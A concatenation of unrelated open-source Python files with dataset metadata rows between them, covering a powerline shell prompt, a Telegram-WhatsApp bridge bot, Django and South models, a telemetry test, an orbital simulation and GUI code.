path += os.sep + names[i]
if os.path.samefile(path, home):
return ['~'] + names[i+1:]
if not names[0]:
return ['/']
return names
def add_cwd_segment():
cwd = powerline.cwd or os.getenv('PWD')
names = get_short_path(cwd.decode('utf-8'))
max_depth = powerline.args.cwd_max_depth
if len(names) > max_depth:
names = names[:2] + [u'\u2026'] + names[2 - max_depth:]
if not powerline.args.cwd_only:
for n in names[:-1]:
if n == '~' and Color.HOME_SPECIAL_DISPLAY:
powerline.append(' %s ' % n, Color.HOME_FG, Color.HOME_BG)
else:
powerline.append(' %s ' % n, Color.PATH_FG, Color.PATH_BG,
powerline.separator_thin, Color.SEPARATOR_FG)
if names[-1] == '~' and Color.HOME_SPECIAL_DISPLAY:
powerline.append(' %s ' % names[-1], Color.HOME_FG, Color.HOME_BG)
else:
powerline.append(' %s ' % names[-1], Color.CWD_FG, Color.PATH_BG)
add_cwd_segment()
import os
def add_read_only_segment():
cwd = powerline.cwd or os.getenv('PWD')
if not os.access(cwd, os.W_OK):
powerline.append(' %s ' % powerline.lock, Color.READONLY_FG, Color.READONLY_BG)
add_read_only_segment()
import re
import subprocess
def get_git_status():
has_pending_commits = True
has_untracked_files = False
origin_position = ""
output = subprocess.Popen(['git', 'status', '--ignore-submodules'],
env={"LANG": "C", "HOME": os.getenv("HOME")}, stdout=subprocess.PIPE).communicate()[0]
for line in output.split('\n'):
origin_status = re.findall(
r"Your branch is (ahead|behind).*?(\d+) comm", line)
if origin_status:
origin_position = " %d" % int(origin_status[0][1])
if origin_status[0][0] == 'behind':
origin_position += u'\u21E3'
if origin_status[0][0] == 'ahead':
origin_position += u'\u21E1'
if line.find('nothing to commit') >= 0:
has_pending_commits = False
if line.find('Untracked files') >= 0:
has_untracked_files = True
return has_pending_commits, has_untracked_files, origin_position
def add_git_segment():
# See http://git-blame.blogspot.com/2013/06/checking-current-branch-programatically.html
p = subprocess.Popen(['git', 'symbolic-ref', '-q', 'HEAD'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if 'Not a git repo' in err:
return
if out:
branch = out[len('refs/heads/'):].rstrip()
else:
branch = '(Detached)'
has_pending_commits, has_untracked_files, origin_position = get_git_status()
branch += origin_position
if has_untracked_files:
branch += ' +'
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
if has_pending_commits:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
powerline.append(' %s ' % branch, fg, bg)
try:
add_git_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import subprocess
def get_hg_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
output = subprocess.Popen(['hg', 'status'],
stdout=subprocess.PIPE).communicate()[0]
for line in output.split('\n'):
if line == '':
continue
elif line[0] == '?':
has_untracked_files = True
elif line[0] == '!':
has_missing_files = True
else:
has_modified_files = True
return has_modified_files, has_untracked_files, has_missing_files
def add_hg_segment():
branch = os.popen('hg branch 2> /dev/null').read().rstrip()
if len(branch) == 0:
return False
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_hg_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
return powerline.append(' %s ' % branch, fg, bg)
add_hg_segment()
import subprocess
def add_svn_segment():
is_svn = subprocess.Popen(['svn', 'status'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
is_svn_output = is_svn.communicate()[1].strip()
if len(is_svn_output) != 0:
return
#"svn status | grep -c "^[ACDIMRX\\!\\~]"
p1 = subprocess.Popen(['svn', 'status'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
p2 = subprocess.Popen(['grep', '-c', '^[ACDIMR\\!\\~]'],
stdin=p1.stdout, stdout=subprocess.PIPE)
output = p2.communicate()[0].strip()
if len(output) > 0 and int(output) > 0:
changes = output.strip()
powerline.append(' %s ' % changes, Color.SVN_CHANGES_FG, Color.SVN_CHANGES_BG)
try:
add_svn_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import subprocess
def get_fossil_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
output = os.popen('fossil changes 2>/dev/null').read().strip()
has_untracked_files = True if os.popen("fossil extras 2>/dev/null").read().strip() else False
has_missing_files = 'MISSING' in output
has_modified_files = 'EDITED' in output
return has_modified_files, has_untracked_files, has_missing_files
def add_fossil_segment():
subprocess.Popen(['fossil'], stdout=subprocess.PIPE).communicate()[0]
branch = ''.join([i.replace('*','').strip() for i in os.popen("fossil branch 2> /dev/null").read().strip().split("\n") if i.startswith('*')])
if len(branch) == 0:
return
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_fossil_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
powerline.append(' %s ' % branch, fg, bg)
try:
add_fossil_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import re
import subprocess
def add_jobs_segment():
pppid = subprocess.Popen(['ps', '-p', str(os.getppid()), '-oppid='], stdout=subprocess.PIPE).communicate()[0].strip()
output = subprocess.Popen(['ps', '-a', '-o', 'ppid'], stdout=subprocess.PIPE).communicate()[0]
num_jobs = len(re.findall(str(pppid), output)) - 1
if num_jobs > 0:
powerline.append(' %d ' % num_jobs, Color.JOBS_FG, Color.JOBS_BG)
add_jobs_segment()
def add_root_indicator_segment():
root_indicators = {
'bash': ' \\$ ',
'zsh': ' \\$ ',
'bare': ' $ ',
}
bg = Color.CMD_PASSED_BG
fg = Color.CMD_PASSED_FG
if powerline.args.prev_error != 0:
fg = Color.CMD_FAILED_FG
bg = Color.CMD_FAILED_BG
powerline.append(root_indicators[powerline.args.shell], fg, bg)
add_root_indicator_segment()
sys.stdout.write(powerline.draw())
|
mit
| 5,095,947,534,413,453,000
| 27.876812
| 145
| 0.589649
| false
| 3.42207
| false
| false
| false
|
cerndb/wls-cli
|
wls_rest/src/wlscli/common/event.py
|
1
|
2248
|
#!/usr/bin/env python
#*******************************************************************************
# Copyright (C) 2015, CERN
# This software is distributed under the terms of the GNU General Public
# License version 3 (GPL Version 3), copied verbatim in the file "LICENSE".
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as Intergovernmental Organization
# or submit itself to any jurisdiction.
#
#
#*******************************************************************************
'''
Created on Oct 31, 2015
@author: Konrad Kaczkowski
'''
from utils import Operation
class UserEvent(object):
pass
class ConsoleUIEvent(object):
def __init__(self, command):
''' Constructor '''
self.command = command
class AdminChangeEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class AppEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class DeploymentEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class LogsEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class ServerEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class ShowEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class EventFactory(object):
types = { Operation.Server: ServerEvent, Operation.App: AppEvent,
Operation.Deployment: DeploymentEvent, Operation.Logs: LogsEvent,
Operation.Show: ShowEvent, Operation.AdmChange: AdminChangeEvent}
def __new__(cls, operation):
return EventFactory.types[type(operation)](operation)
|
gpl-3.0
| 7,370,498,741,496,446,000
| 30.608696
| 80
| 0.581851
| false
| 4.487026
| false
| false
| false
|
katharosada/bus-shaming
|
busshaming/models/route_ranking.py
|
1
|
1414
|
import uuid
from django.db import connection, models
from busshaming.enums import RouteMetric, MetricTimespan
UPSERT_ENTRY = '''
INSERT INTO busshaming_routeranking (id, route_id, date, timespan, metric, rank, display_rank, value)
VALUES (uuid_generate_v4(), %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (date, timespan, metric, rank)
DO UPDATE
SET route_id = EXCLUDED.route_id,
display_rank = EXCLUDED.display_rank,
value = EXCLUDED.value
'''
class RouteRankingManager(models.Manager):
def upsert(self, route_id, date, timespan, metric, rank, display_rank, value):
with connection.cursor() as cursor:
cursor.execute(UPSERT_ENTRY, (route_id, date, timespan, metric, rank, display_rank, value))
class RouteRanking(models.Model):
"""Denormalization of top N of each different kind of ranking."""
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
route = models.ForeignKey('Route')
date = models.DateField(db_index=True)
timespan = models.PositiveSmallIntegerField(choices=MetricTimespan.choices())
metric = models.PositiveSmallIntegerField(choices=RouteMetric.choices())
rank = models.PositiveSmallIntegerField()
display_rank = models.PositiveSmallIntegerField()
value = models.FloatField()
class Meta:
index_together = (('date', 'timespan', 'metric'),)
unique_together = (('date', 'timespan', 'metric', 'rank'),)
|
mit
| -8,858,094,445,648,581,000
| 36.210526
| 103
| 0.706506
| false
| 3.570707
| false
| false
| false
|
Overdrivr/pytelemetry
|
pytelemetry/test/test_typing.py
|
1
|
1747
|
from pytelemetry import Pytelemetry
import queue
import pytest
import unittest.mock as mock
class transportMock:
def __init__(self):
self.queue = queue.Queue()
def read(self, maxbytes=1):
data = []
amount = 0
while amount < maxbytes and not self.queue.empty():
c = self.queue.get()
data.append(c)
amount += 1
return data
def readable(self):
return self.queue.qsize()
def write(self, data):
for i in range(len(data)):
self.queue.put(data[i])
return 0
def writeable(self):
return not self.queue.full()
def test_wrong_type():
# Setup
t = transportMock()
c = Pytelemetry(t)
with pytest.raises(Exception) as excinfo:
c.publish('sometopic',12,'string')
# TODO : Assert exception
assert t.queue.qsize() == 0
def test_unexisting_type():
# Setup
t = transportMock()
c = Pytelemetry(t)
with pytest.raises(IndexError):
c.publish('sometopic',12,'int323')
assert t.queue.qsize() == 0
def test_hardcoded():
t = transportMock()
c = Pytelemetry(t)
cb = mock.Mock(spec=["topic","data"])
c.subscribe('sometopic ',cb)
# Apply hardcoded frame directly generated by the c library
# SOF head sometopic..................................... eol 12457........ crc..... eof
t.write([247, 6, 0, 115, 111, 109, 101, 116, 111, 112, 105, 99, 32, 0, 169, 48, 0, 0, 111, 249, 127])
c.update()
assert t.queue.qsize() == 0
cb.assert_called_once_with('sometopic ',12457, None)
# TODO : Check what happens is string is non null terminated
# TODO : Check what happens if there are spaces in name
# TODO Check wrong crc
|
mit
| -6,212,126,936,606,328,000
| 25.876923
| 105
| 0.588437
| false
| 3.565306
| true
| false
| false
|
MikeHoffert/caladbolg-engine
|
caladbolg/agents/battle.py
|
1
|
1210
|
import pyglet
from caladbolg.graphics import graphics_context
class ScriptedBattle:
def __init__(self, background_image, monsters, party):
self.background_image = background_image
self.monsters = monsters
self.party = party
def start_battle(self):
image = pyglet.image.load(self.background_image)
background_sprite = pyglet.sprite.Sprite(image)
# Figure out if we need to scale the background image for the user's screen
sprite_width = background_sprite.width
sprite_height = background_sprite.height
screen_width = graphics_context.screen_width
screen_height = graphics_context.screen_height
scale_factor = 1
if sprite_width < screen_width or sprite_height < screen_height:
scale_factor = min(screen_width / sprite_width, screen_height / sprite_height)
elif sprite_width > screen_width and sprite_height > screen_height:
scale_factor = max(screen_width / sprite_width, screen_height / sprite_height)
background_sprite.scale = scale_factor
graphics_context.sprite_buffer['background']['battle_background'] = background_sprite
|
mit
| -1,500,129,962,873,362,000
| 42.814815
| 93
| 0.671901
| false
| 4.29078
| false
| false
| false
|
LeoGe/whattelcopybot
|
telegram_bot.py
|
1
|
6255
|
from multiprocessing import Process, Pipe
from os import getpid, urandom, path
from time import sleep
from enum import Enum
import binascii, json, signal, sys
from random import randint
from telegram.ext import Updater
from telegram.ext.dispatcher import run_async
from telegram.update import Update
class Command(Enum):
message = 1
token = 2
token_ack = 3
delete = 4
class TelegramBot(Process):
CREDENTIALS = "<CREDENTIALS-HERE>"
SAVEPATH = path.expanduser("~") + "/.config/whattelcopybot/telegram"
def __init__(self, conn):
self.connection=conn
super(TelegramBot, self).__init__()
self.telegram_to_whatsapp=dict()
with open("tokens.txt") as f:
self.poems = f.read().splitlines()
# save hashmap to file when exit
def save_to_file(self, signum, frame):
with open(TelegramBot.SAVEPATH, 'w+') as f:
f.write(json.dumps(self.telegram_to_whatsapp))
f.truncate()
sys.exit(0)
#load hashmap from file (if it exists and is not empty)
def load_from_file(self):
if path.isfile(TelegramBot.SAVEPATH):
with open(TelegramBot.SAVEPATH) as f:
read=f.read()
if read!="":
self.telegram_to_whatsapp = json.loads(read)
#send message to Telegram chat
def got_whatsapp(self, bot, msg):
if not "," in msg:
bot.sendMessage(int(msg), "Success: Connected to Whatsapp group!")
else:
telegram_id, content = msg.split(",")
bot.sendMessage(int(telegram_id), text=content)
# if both groups are connected send message to WhatsappBot
def got_telegram(self,bot,update):
if not type(update) is Update or update.message == None:
return
if update.message.new_chat_participant!=None:
if update.message.new_chat_participant.username=="WhattelCopyBot":
self.help(bot,update)
elif update.message.left_chat_participant!=None:
if update.message.left_chat_participant.username=="WhattelCopyBot":
print("REMOVE")
if str(update.message.chat_id) in self.telegram_to_whatsapp:
self.connection.send([Command.delete, self.telegram_to_whatsapp[str(update.message.chat_id)]])
del self.telegram_to_whatsapp[str(update.message.chat_id)]
elif str(update.message.chat_id) in self.telegram_to_whatsapp:
whatsapp_id=self.telegram_to_whatsapp[str(update.message.chat_id)]
self.connection.send([Command.message, whatsapp_id, update.message.from_user.first_name+ ": " + update.message.text])
def help(self,bot,update):
helpText="Hello Traveller, my name is John Whattel. I will copy all of your messages from whatsapp to telegram and vice versa.\n/token (generate token to connects two chats)\n/delete (disconnects the chats)\n/help (show this notice again)"
bot.sendMessage(update.message.chat_id,text=helpText)
# generate token and send it to WhatsappBot and to the Telegram chat
def get_token(self, bot, update):
if str(update.message.chat_id) in self.telegram_to_whatsapp:
bot.sendMessage(update.message.chat_id,text="Sorry, chat is already connected to a Whatsapp group!")
return
rand_int = randint(0,len(self.poems))
while self.poems[rand_int] == "":
rand_int = randint(0,len(self.poems))
bot.sendMessage(update.message.chat_id, text="Please paste this token into the Whatsapp chat you want to be connected to. I have to be a member of this chat.")
bot.sendMessage(update.message.chat_id, text="Generated token: "+self.poems[rand_int])
self.connection.send([Command.token, self.poems[rand_int], update.message.chat_id])
self.poems[rand_int]=""
def delete(self, bot, update):
if str(update.message.chat_id) in self.telegram_to_whatsapp:
self.connection.send([Command.delete, self.telegram_to_whatsapp[str(update.message.chat_id)]])
del self.telegram_to_whatsapp[str(update.message.chat_id)]
bot.sendMessage(update.message.chat_id, text="Hey there, this chat connecion was deleted")
else:
bot.sendMessage(update.message.chat_id, text="Something went terribly wrong :( This chat is not connected")
def run(self):
print("Start TelegramBot with PID: " + str(getpid()))
# connect to TelegramBot with CREDENTIALS
updater = Updater(TelegramBot.CREDENTIALS)
# Get the dispatcher to register handlers
dp = updater.dispatcher
# Message handlers only receive updates that don't contain commands
dp.addTelegramMessageHandler(self.got_telegram)
# got a whatsapp message
dp.addStringRegexHandler('[^/].*', self.got_whatsapp)
dp.addTelegramCommandHandler("help", self.help)
dp.addTelegramCommandHandler("token", self.get_token)
dp.addTelegramCommandHandler("delete", self.delete)
# All TelegramErrors are caught for you and delivered to the error
# handler(s). Other types of Errors are not caught.
#dp.addErrorHandler(error)
# Start the Bot and store the update Queue, so we can insert updates
update_queue = updater.start_polling(poll_interval=0.1, timeout=10)
# save our hashmap when the TelegramBot is terminated
signal.signal(signal.SIGINT, self.save_to_file)
signal.signal(signal.SIGTERM, self.save_to_file)
# load our hashmap when the TelegramBot is started
self.load_from_file()
isRunning = True
while isRunning:
msg = self.connection.recv()
if msg[0] == Command.message:
update_queue.put(str(msg[1])+","+str(msg[2]))
elif msg[0] == Command.token_ack:
# connect Telegram ID to Whatsapp ID
self.telegram_to_whatsapp[str(msg[2])] = msg[1]
update_queue.put(str(msg[2]))
elif msg[0] == Command.token:
print("Error: got wrong message from WhatsappBot")
|
mit
| 7,155,374,051,801,064,000
| 42.4375
| 247
| 0.63757
| false
| 3.707765
| false
| false
| false
|
quasars100/Resonance_testing_scripts
|
python_examples/outersolarsystem/problem.py
|
1
|
1831
|
# Import the rebound module
import rebound
# Set variables (defaults are G=1, t=0, dt=0.01)
k = 0.01720209895 # Gaussian constant
rebound.G = k*k # Gravitational constant
# Setup particles (data taken from NASA Horizons)
# This could also be easily read in from a file.
rebound.add( m=1.00000597682, x=-4.06428567034226e-3, y=-6.08813756435987e-3, z=-1.66162304225834e-6, vx=+6.69048890636161e-6, vy=-6.33922479583593e-6, vz=-3.13202145590767e-9) # Sun
rebound.add( m=1./1047.355, x=+3.40546614227466e+0, y=+3.62978190075864e+0, z=+3.42386261766577e-2, vx=-5.59797969310664e-3, vy=+5.51815399480116e-3, vz=-2.66711392865591e-6) # Jupiter
rebound.add( m=1./3501.6, x=+6.60801554403466e+0, y=+6.38084674585064e+0, z=-1.36145963724542e-1, vx=-4.17354020307064e-3, vy=+3.99723751748116e-3, vz=+1.67206320571441e-5) # Saturn
rebound.add( m=1./22869., x=+1.11636331405597e+1, y=+1.60373479057256e+1, z=+3.61783279369958e-1, vx=-3.25884806151064e-3, vy=+2.06438412905916e-3, vz=-2.17699042180559e-5) # Uranus
rebound.add( m=1./19314., x=-3.01777243405203e+1, y=+1.91155314998064e+0, z=-1.53887595621042e-1, vx=-2.17471785045538e-4, vy=-3.11361111025884e-3, vz=+3.58344705491441e-5) # Neptune
rebound.add( m=0, x=-2.13858977531573e+1, y=+3.20719104739886e+1, z=+2.49245689556096e+0, vx=-1.76936577252484e-3, vy=-2.06720938381724e-3, vz=+6.58091931493844e-4) # Pluto
# Set the center of momentum to be at the origin
rebound.move_to_com()
# timestep counter
steps = 0
# Integrate until t=1e6 (unit of time in this example is days)
while rebound.t < 1e6:
rebound.step()
steps += 1
# Print particle positions every 100 timesteps
if steps%100==0:
for p in rebound.particles:
# time x y z
print(rebound.t, p.x, p.y, p.z)
|
gpl-3.0
| 544,620,907,989,148,000
| 58.064516
| 188
| 0.687602
| false
| 2.154118
| false
| false
| false
|
hzlf/openbroadcast
|
website/apps/spf/migrations/0020_auto__add_field_match_isrc_list.py
|
1
|
5230
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Match.isrc_list'
db.add_column('spf_match', 'isrc_list',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Match.isrc_list'
db.delete_column('spf_match', 'isrc_list')
models = {
'spf.match': {
'Meta': {'ordering': "('created',)", 'object_name': 'Match'},
'artist': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'artist_credits': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'artist_credits_secondary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'duration': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isrc_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'iswc_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'mb_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'release': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'release_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'request': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['spf.Request']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'results_mb': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'work_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'spf.request': {
'Meta': {'ordering': "('swp_id',)", 'object_name': 'Request'},
'catalognumber': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'composer': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'duration': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isrc': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'level': ('django.db.models.fields.IntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'main_artist': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'num_results': ('django.db.models.fields.IntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'obp_legacy_id': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'publication_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'publication_datex': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'recording_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'recording_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'recording_datex': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'results_mb': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'rome_protected': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'swp_id': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['spf']
|
gpl-3.0
| -3,241,384,390,019,928,600
| 74.811594
| 169
| 0.546654
| false
| 3.524259
| false
| false
| false
|
vinoth3v/In
|
In/nabar/admin/form/nabar_role.py
|
1
|
1255
|
class FormNabarRoleAdmin(Form):
def __init__(self, data = None, items = None, post = None, **args):
if data is None: data = {}
if post is None: post = {}
if 'id' not in data:
data['id'] = 'FormNabarRoleAdmin'
super().__init__(data, items, **args)
set = self.add('FieldSet', {
'id' : 'set',
'css' : ['i-form-row i-margin-large']
})
table = set.add('HTMLTable')
roles = IN.nabar.roles
for rid, role in roles.items():
row = table['body'].add('HTMLTableRow')
row.add('HTMLTableColumn', {
'value' : role['name'],
'weight' : 1,
})
row.add('HTMLTableColumn', {
'value' : role['info'],
'weight' : 2,
})
set = self.add('FieldSet', {
'id' : 'actionset',
'css' : ['i-form-row i-text-primary']
})
#set.add('Submit', {
#'id' : 'submit',
#'value' : s('Register new account'),
#'css' : ['i-button i-button-primary i-button-large']
#})
self.css.append('i-panel i-panel-box i-margin-large')
@IN.register('FormNabarRoleAdmin', type = 'Former')
class FormNabarRoleAdminFormer(FormFormer):
def validate(self, form, post):
if form.has_errors: # fields may have errors
return
def submit(self, form, post):
if form.has_errors:
return
|
apache-2.0
| 6,403,613,754,088,764,000
| 18.307692
| 68
| 0.578486
| false
| 2.752193
| false
| false
| false
|
expfactory/expfactory
|
expfactory/cli/users.py
|
1
|
3386
|
"""
Copyright (c) 2017-2021, Vanessa Sochat
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from expfactory.logger import bot
from expfactory.defaults import EXPFACTORY_DATABASE
import sys
import os
def main(args, parser, subparser):
from expfactory.server import app
header = "DATABASE\tTOKEN"
# The user wants to list active subjects
if args.list is True:
users = app.list_users() # returns id\ttoken
sys.exit(0)
# The user wants to add new subjects
number = args.new
if number is not None:
print(header)
for i in range(number):
user = app.generate_user()
app.print_user(user)
sys.exit(0)
# The user wants to manage user token
action = None
if args.revoke is not None:
subid = clean(args.revoke)
func = app.revoke_token
action = "Revoking"
elif args.refresh is not None:
subid = clean(args.refresh)
func = app.refresh_token
action = "Refreshing"
elif args.restart is not None:
subid = clean(args.restart)
func = app.restart_user
action = "Restarting"
elif args.finish is not None:
subid = clean(args.finish)
action = "Finishing"
func = app.finish_user
# Perform the action
if action is not None:
bot.info("%s %s" % (action, subid))
result = func(subid=subid)
if result is not None:
print("[%s] %s --> %s" % (action.lower(), subid, result))
else:
print("[%s] not successful. See logs for details." % (action.lower()))
print("Commands may only possible for [active] status.")
sys.exit(0)
print("See expfactory users --help for usage")
def clean(subid):
"""clean a subid, removing any folder extensions (_revoked or _finished)
for the functions
"""
for ext in ["_revoked", "_revoked"]:
subid = subid.replace(ext, "")
return subid
|
bsd-3-clause
| 55,951,420,547,235,040
| 33.20202
| 82
| 0.69049
| false
| 4.227216
| false
| false
| false
|
mhogg/BMDanalyse
|
BMDanalyse/MainWindow.py
|
1
|
30163
|
# -*- coding: utf-8 -*-
# Copyright (C) 2016 Michael Hogg
# This file is part of BMDanalyse - See LICENSE.txt for information on usage and redistribution
import os, matplotlib, matplotlib.pyplot, types
import numpy as np
from pyqtgraph.Qt import QtCore, QtGui
from pyqtgraph import ImageItem
from pyqtgraph.widgets.GraphicsLayoutWidget import GraphicsLayoutWidget
from PIL import Image
from ViewBoxCustom import MultiRoiViewBox, ImageAnalysisViewBox
from MatplotlibWidget import MatplotlibWidget
from SidePanel import SidePanel
from TableWidget import TableWidget
from version import __version__
absDirPath = os.path.dirname(__file__)
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
self.loadIcons()
self.setupUserInterface()
self.setupSignals()
self.__version__ = __version__
# Initialise variables
self.imageFiles = {}
self.timeData = None
self.plotWin = None
self.imageWin = None
self.BMDchange = None
self.roiNames = None
def loadIcons(self):
""" Load icons """
self.icons = dict([
('BMDanalyseIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","logo.png"))),
('imageAddIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_add.png"))),
('imageRemIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_delete2.png"))),
('imageDownIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-up-2.png"))),
('imageUpIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-down-2.png"))),
('imagePrevIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-left.png"))),
('imageNextIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-right.png"))),
('roiAddIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","green-add3.png"))),
('roiRectIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","rectangularIcon.png"))),
('roiPolyIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","polygonIcon.png"))),
('roiRemIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","red_delete.png"))),
('roiSaveIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","filesave.png"))),
('roiCopyIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_copy.png"))),
('roiLoadIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","opened-folder.png")))])
def setupUserInterface(self):
""" Initialise the User Interface """
# Left frame
leftFrame = QtGui.QFrame()
leftFrameLayout = QtGui.QHBoxLayout()
leftFrame.setLayout(leftFrameLayout)
leftFrame.setLineWidth(0)
leftFrame.setFrameStyle(QtGui.QFrame.Panel)
leftFrameLayout.setContentsMargins(0,0,5,0)
# Left frame contents
self.viewMain = GraphicsLayoutWidget() # A GraphicsLayout within a GraphicsView
